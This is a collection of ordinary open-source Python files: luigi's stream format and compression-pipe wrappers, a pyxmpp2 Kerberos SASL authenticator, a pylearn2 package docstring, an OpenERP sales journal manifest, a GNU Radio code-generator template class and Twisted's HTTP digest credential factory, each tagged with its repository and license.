WRITES_BEFORE_FLUSH = 10000
def __init__(self, command, output_pipe=None):
self.closed = False
self._command = command
self._output_pipe = output_pipe
self._process = subprocess.Popen(command,
stdin=subprocess.PIPE,
stdout=output_pipe,
close_fds=True)
self._flushcount = 0
def write(self, *args, **kwargs):
self._process.stdin.write(*args, **kwargs)
self._flushcount += 1
if self._flushcount == self.WRITES_BEFORE_FLUSH:
self._process.stdin.flush()
self._flushcount = 0
def writeLine(self, line):
assert '\n' not in line
self.write(line + '\n')
def _finish(self):
"""
Closes and waits for subprocess to exit.
"""
if self._process.returncode is None:
self._process.stdin.flush()
self._process.stdin.close()
self._process.wait()
self.closed = True
def __del__(self):
if not self.closed:
self.abort()
def __exit__(self, type, value, traceback):
if type is None:
self.close()
else:
self.abort()
def __enter__(self):
return self
def close(self):
self._finish()
if self._process.returncode == 0:
if self._output_pipe is not None:
self._output_pipe.close()
else:
raise RuntimeError('Error when executing command %s' % self._command)
def abort(self):
self._finish()
def __getattr__(self, name):
if name == '_process':
raise AttributeError(name)
try:
return getattr(self._process.stdin, name)
except AttributeError:
return getattr(self._output_pipe, name)
def readable(self):
return False
def writable(self):
return True
def seekable(self):
return False
class BaseWrapper(object):
def __init__(self, stream, *args, **kwargs):
self._stream = stream
try:
super(BaseWrapper, self).__init__(stream, *args, **kwargs)
except TypeError:
pass
def __getattr__(self, name):
if name == '_stream':
raise AttributeError(name)
return getattr(self._stream, name)
def __enter__(self):
self._stream.__enter__()
return self
def __exit__(self, *args):
self._stream.__exit__(*args)
def __iter__(self):
try:
for line in self._stream:
yield line
finally:
self.close()
class NewlineWrapper(BaseWrapper):
def __init__(self, stream, newline=None):
if newline is None:
self.newline = newline
else:
self.newline = newline.encode('ascii')
if self.newline not in (b'', b'\r\n', b'\n', b'\r', None):
raise ValueError("newline need to be one of {b'', b'\r\n', b'\n', b'\r', None}")
super(NewlineWrapper, self).__init__(stream)
def read(self, n=-1):
b = self._stream.read(n)
if self.newline == b'':
return b
        if self.newline is None:
            newline = b'\n'
        else:
            newline = self.newline
return re.sub(b'(\n|\r\n|\r)', newline, b)
def writelines(self, lines):
if self.newline is None or self.newline == '':
newline = os.linesep.encode('ascii')
else:
newline = self.newline
self._stream.writelines(
(re.sub(b'(\n|\r\n|\r)', newline, line) for line in lines)
)
def write(self, b):
if self.newline is None or self.newline == '':
newline = os.linesep.encode('ascii')
else:
newline = self.newline
self._stream.write(re.sub(b'(\n|\r\n|\r)', newline, b))
class MixedUnicodeBytesWrapper(BaseWrapper):
"""
"""
def __init__(self, stream, encoding=None):
if encoding is None:
encoding = locale.getpreferredencoding()
self.encoding = encoding
super(MixedUnicodeBytesWrapper, self).__init__(stream)
def write(self, b):
self._stream.write(self._convert(b))
def writelines(self, lines):
self._stream.writelines((self._convert(line) for line in lines))
def _convert(self, b):
if isinstance(b, six.text_type):
b = b.encode(self.encoding)
warnings.warn('Writing unicode to byte stream', stacklevel=2)
return b
class Format(object):
"""
Interface for format specifications.
"""
@classmethod
def pipe_reader(cls, input_pipe):
raise NotImplementedError()
@classmethod
def pipe_writer(cls, output_pipe):
raise NotImplementedError()
def __rshift__(a, b):
return ChainFormat(a, b)
class ChainFormat(Format):
def __init__(self, *args, **kwargs):
self.args = args
try:
self.input = args[0].input
except AttributeError:
pass
try:
self.output = args[-1].output
except AttributeError:
pass
if not kwargs.get('check_consistency', True):
return
for x in range(len(args) - 1):
try:
if args[x].output != args[x + 1].input:
raise TypeError(
                        'The format chaining is not valid, %s expects %s '
                        'but %s provides %s' % (
args[x].__class__.__name__,
args[x].input,
args[x + 1].__class__.__name__,
args[x + 1].output,
)
)
except AttributeError:
pass
def pipe_reader(self, input_pipe):
for x in reversed(self.args):
input_pipe = x.pipe_reader(input_pipe)
return input_pipe
def pipe_writer(self, output_pipe):
for x in reversed(self.args):
output_pipe = x.pipe_writer(output_pipe)
return output_pipe
class TextWrapper(io.TextIOWrapper):
def __exit__(self, *args):
# io.TextIOWrapper close the file on __exit__, let the underlying file decide
if not self.closed and self.writable():
super(TextWrapper, self).flush()
self._stream.__exit__(*args)
def __del__(self, *args):
# io.TextIOWrapper close the file on __del__, let the underlying file decide
if not self.closed and self.writable():
super(TextWrapper, self).flush()
try:
self._stream.__del__(*args)
except AttributeError:
pass
def __init__(self, stream, *args, **kwargs):
self._stream = stream
try:
super(TextWrapper, self).__init__(stream, *args, **kwargs)
except TypeError:
pass
def __getattr__(self, name):
if name == '_stream':
raise AttributeError(name)
return getattr(self._stream, name)
def __enter__(self):
self._stream.__enter__()
return self
class NopFormat(Format):
def pipe_reader(self, input_pipe):
return input_pipe
def pipe_writer(self, output_pipe):
return output_pipe
class WrappedFormat(Format):
def __init__(self, *args, **kwargs):
self.args = args
self.kwargs = kwargs
def pipe_reader(self, input_pipe):
return self.wrapper_cls(input_pipe, *self.args, **self.kwargs)
def pipe_writer(self, output_pipe):
return self.wrapper_cls(output_pipe, *self.args, **self.kwargs)
class TextFormat(WrappedFormat):
input = 'unicode'
output = 'bytes'
wrapper_cls = TextWrapper
class MixedUnicodeBytesFormat(WrappedFormat):
output = 'bytes'
wrapper_cls = MixedUnicodeBytesWrapper
class NewlineFormat(WrappedFormat):
input = 'bytes'
output = 'bytes'
wrapper_cls = NewlineWrapper
class GzipFormat(Format):
input = 'bytes'
output = 'bytes'
def __init__(self, compression_level=None):
self.compression_level = compression_level
def pipe_reader(self, input_pipe):
return InputPipeProcessWrapper(['gunzip'], input_pipe)
def pipe_writer(self, output_pipe):
args = ['gzip']
if self.compression_level is not None:
args.append('-' + str(int(self.compression_level)))
return OutputPipeProcessWrapper(args, output_pipe)
class Bzip2Format(Format):
input = 'bytes'
output = 'bytes'
def pipe_reader(self, input_pipe):
return InputPipeProcessWrapper(['bzcat'], input_pipe)
def pipe_writer(self, output_pipe):
return OutputPipeProcessWrapper(['bzip2'], output_pipe)
Text = TextFormat()
UTF8 = TextFormat(encoding='utf8')
Nop = NopFormat()
SysNewLine = NewlineFormat()
Gzip = GzipFormat()
Bzip2 = Bzip2Format()
MixedUnicodeBytes = MixedUnicodeBytesFormat()
def get_default_format():
if six.PY3:
return Text
elif os.linesep == '\n':
return Nop
else:
return SysNewLine
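# Illustrative composition of formats (a sketch; `SomeTarget` is a
# hypothetical stand-in for a luigi Target accepting a `format` argument):
#
#     fmt = UTF8 >> Gzip   # unicode for the application, gzip bytes on disk
#     with SomeTarget('data.txt.gz', format=fmt).open('w') as f:
#         f.write(u'hello\n')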
| ViaSat/luigi | luigi/format.py | Python | apache-2.0 | 14,652 |
#
# (C) Copyright 2008 Jelmer Vernooij <[email protected]>
# (C) Copyright 2011 Jacek Konieczny <[email protected]>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License Version
# 2.1 as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
#
"""GSSAPI authentication mechanism for PyXMPP SASL implementation.
Normative reference:
- `RFC 4752 <http://www.ietf.org/rfc/rfc4752.txt>`__
"""
__docformat__ = "restructuredtext en"
import base64
import kerberos
import logging
from .core import ClientAuthenticator, Response, Success
from .core import sasl_mechanism
logger = logging.getLogger("pyxmpp2.sasl.gssapi")
@sasl_mechanism("GSSAPI", 75)
class GSSAPIClientAuthenticator(ClientAuthenticator):
"""Provides client-side GSSAPI SASL (Kerberos 5) authentication."""
def __init__(self, password_manager):
ClientAuthenticator.__init__(self, password_manager)
self.password_manager = password_manager
self.username = None
self._gss = None
self.step = None
self.authzid = None
def start(self, username, authzid):
self.username = username
self.authzid = authzid
_unused, self._gss = kerberos.authGSSClientInit(authzid or
"{0}@{1}".format("xmpp",
self.password_manager.get_serv_host()))
self.step = 0
return self.challenge("")
def challenge(self, challenge):
if self.step == 0:
ret = kerberos.authGSSClientStep(self._gss,
base64.b64encode(challenge))
if ret != kerberos.AUTH_GSS_CONTINUE:
self.step = 1
elif self.step == 1:
ret = kerberos.authGSSClientUnwrap(self._gss,
base64.b64encode(challenge))
response = kerberos.authGSSClientResponse(self._gss)
ret = kerberos.authGSSClientWrap(self._gss, response, self.username)
response = kerberos.authGSSClientResponse(self._gss)
if response is None:
return Response("")
else:
return Response(base64.b64decode(response))
def finish(self, data):
self.username = kerberos.authGSSClientUserName(self._gss)
logger.debug("Authenticated as {0!r}".format(
kerberos.authGSSClientUserName(self._gss)))
return Success(self.username, None, self.authzid)
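# Illustrative client-side flow (a sketch; in practice the pyxmpp2 SASL core
# drives these calls after selecting the mechanism from its registry):
#
#     authenticator = GSSAPIClientAuthenticator(password_manager)
#     response = authenticator.start(username, authzid)      # initial Response
#     response = authenticator.challenge(server_challenge)   # per challenge
#     success = authenticator.finish("")                     # -> Success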
# vi: sts=4 et sw=4
| pforret/python-for-android | python3-alpha/python-libs/pyxmpp2/sasl/gssapi.py | Python | apache-2.0 | 3,008 |
"""
Some scripts define objects that we want to import via yaml files
that we pass to the script, so this directory must be a python
module, rather than just a directory full of scripts.
"""
| fyffyt/pylearn2 | pylearn2/scripts/__init__.py | Python | bsd-3-clause | 191 |
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Invoicing Journals',
'version': '1.0',
'category': 'Sales Management',
'description': """
    The sales journal module allows you to categorise your sales and deliveries (picking lists) between different journals.
========================================================================================================================
This module is very helpful for bigger companies that works by departments.
You can use journal for different purposes, some examples:
----------------------------------------------------------
* isolate sales of different departments
* journals for deliveries by truck or by UPS
    Journals have a responsible user and evolve through different states:
-----------------------------------------------------------------
* draft, open, cancel, done.
Batch operations can be processed on the different journals to confirm all sales
at once, to validate or invoice packing.
It also supports batch invoicing methods that can be configured by partners and sales orders, examples:
-------------------------------------------------------------------------------------------------------
* daily invoicing
* monthly invoicing
Some statistics by journals are provided.
""",
'author': 'OpenERP SA',
'website': 'https://www.odoo.com/page/billing',
'images': ['images/invoice_type.jpeg'],
'depends': ['sale_stock'],
'data': [
'security/ir.model.access.csv',
'sale_journal_view.xml',
'sale_journal_data.xml'
],
'demo': ['sale_journal_demo.xml'],
'test': [ ],
'installable': True,
'auto_install': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| diogocs1/comps | web/addons/sale_journal/__openerp__.py | Python | apache-2.0 | 2,681 |
#
# Copyright 2013 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
""" A code generator (needed by ModToolAdd) """
from templates import Templates
import Cheetah.Template
from util_functions import str_to_fancyc_comment
from util_functions import str_to_python_comment
from util_functions import strip_default_values
from util_functions import strip_arg_types
from util_functions import strip_arg_types_grc
class GRMTemplate(Cheetah.Template.Template):
""" An extended template class """
def __init__(self, src, searchList):
self.grtypelist = {
'sync': 'sync_block',
'sink': 'sync_block',
'source': 'sync_block',
'decimator': 'sync_decimator',
'interpolator': 'sync_interpolator',
'general': 'block',
'tagged_stream': 'tagged_stream_block',
'hier': 'hier_block2',
'noblock': ''}
searchList['str_to_fancyc_comment'] = str_to_fancyc_comment
searchList['str_to_python_comment'] = str_to_python_comment
searchList['strip_default_values'] = strip_default_values
searchList['strip_arg_types'] = strip_arg_types
searchList['strip_arg_types_grc'] = strip_arg_types_grc
Cheetah.Template.Template.__init__(self, src, searchList=searchList)
self.grblocktype = self.grtypelist[searchList['blocktype']]
if searchList['is_component']:
self.include_dir_prefix = "gnuradio/" + searchList['modname']
else:
self.include_dir_prefix = searchList['modname']
def get_template(tpl_id, **kwargs):
""" Return the template given by tpl_id, parsed through Cheetah """
return str(GRMTemplate(Templates[tpl_id], searchList=kwargs))
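# Illustrative call (a sketch; the template ID and keyword set shown are
# assumptions -- valid IDs are the keys of templates.Templates):
#
#     code = get_template('block_impl_cpp', modname='howto',
#                         blockname='square_ff', blocktype='sync',
#                         is_component=False)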
| riveridea/gnuradio | gr-utils/python/modtool/code_generator.py | Python | gpl-3.0 | 2,485 |
# -*- test-case-name: twisted.web.test.test_httpauth -*-
# Copyright (c) 2009 Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Implementation of RFC2617: HTTP Digest Authentication
@see: U{http://www.faqs.org/rfcs/rfc2617.html}
"""
from zope.interface import implements
from twisted.cred import credentials
from twisted.web.iweb import ICredentialFactory
class DigestCredentialFactory(object):
"""
Wrapper for L{digest.DigestCredentialFactory} that implements the
L{ICredentialFactory} interface.
"""
implements(ICredentialFactory)
scheme = 'digest'
def __init__(self, algorithm, authenticationRealm):
"""
Create the digest credential factory that this object wraps.
"""
self.digest = credentials.DigestCredentialFactory(algorithm,
authenticationRealm)
def getChallenge(self, request):
"""
Generate the challenge for use in the WWW-Authenticate header
        @param request: The L{IRequest} to which access was denied and for the
response to which this challenge is being generated.
@return: The C{dict} that can be used to generate a WWW-Authenticate
header.
"""
return self.digest.getChallenge(request.getClientIP())
def decode(self, response, request):
"""
Create a L{twisted.cred.digest.DigestedCredentials} object from the
given response and request.
@see: L{ICredentialFactory.decode}
"""
return self.digest.decode(response,
request.method,
request.getClientIP())
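# Illustrative wiring (a sketch; portal construction is omitted and the
# realm string is hypothetical):
#
#     from twisted.web.guard import HTTPAuthSessionWrapper
#     factory = DigestCredentialFactory('md5', 'example.com')
#     resource = HTTPAuthSessionWrapper(portal, [factory])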
| jxta/cc | vendor/Twisted-10.0.0/twisted/web/_auth/digest.py | Python | apache-2.0 | 1,700 |